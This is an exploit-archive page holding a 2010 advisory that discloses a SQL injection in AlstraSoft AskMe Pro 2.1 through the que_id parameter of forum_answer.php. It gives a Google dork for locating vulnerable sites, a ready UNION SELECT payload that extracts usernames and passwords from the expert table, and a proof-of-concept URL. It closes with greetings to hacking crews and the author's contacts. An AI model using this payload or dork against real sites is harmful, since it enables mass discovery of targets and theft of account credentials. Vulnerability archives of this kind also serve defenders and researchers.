AskMe Pro 2.1 SQL Injection

AskMe Pro 2.1 SQL Injection: Posted Apr 27, 2010; Authored by v3n0m; AskMe Pro version 2.1 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | f04e648edb0e82f5f9847e1fbf857d05593598861684f5e3286026ed250bcc28; Download | Favorite | View

AskMe Pro 2.1 SQL Injection

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
                    .WEB.ID
-----------------------------------------------------------------------
         AskMe Pro 2.1 (que_id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author    : v3n0m
Site      : http://yogyacarderlink.web.id/
Date    : April, 24-2010
Location  : Jakarta, Indonesia
Time Zone  : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application  : AlstraSoft AskMe Pro
Vendor    : http://www.alstrasoft.com/
Price    : $99.99 USD
Google Dork  : allinurl:forum_answer.php?que_id=
Overview  :

AskMe Pro is an expert knowledge management system that allows site owners to 
setup an expert advice service similar to highly popular sites like Google Answers,
Yahoo Answers and Kasamba.com
----------------------------------------------------------------

Exploit:
~~~~~~~

-9999+union+all+select+1,2,3,4,group_concat(username,char(58),password)v3n0m,6,7,8,9,10+from+expert--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/forum_answer.php?que_id=[SQLi]

----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (banting setir dari tukang martabak jd distributor chiki,stress sampe cukur rambut,jembut cukur ur)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;)
- elicha cristia [ luv You...luv You...luv You... :) ]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
    http://v3n0m.blogdetik.com/
    http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------

Top Authors In Last 30 Days

Red Hat 286 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 6 files
Milad Karimi 4 files
Google Security Research 3 files
Adam Gowdiak 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

AskMe Pro 2.1 SQL Injection

AskMe Pro 2.1 SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

AskMe Pro 2.1 SQL Injection

Share This

AskMe Pro 2.1 SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems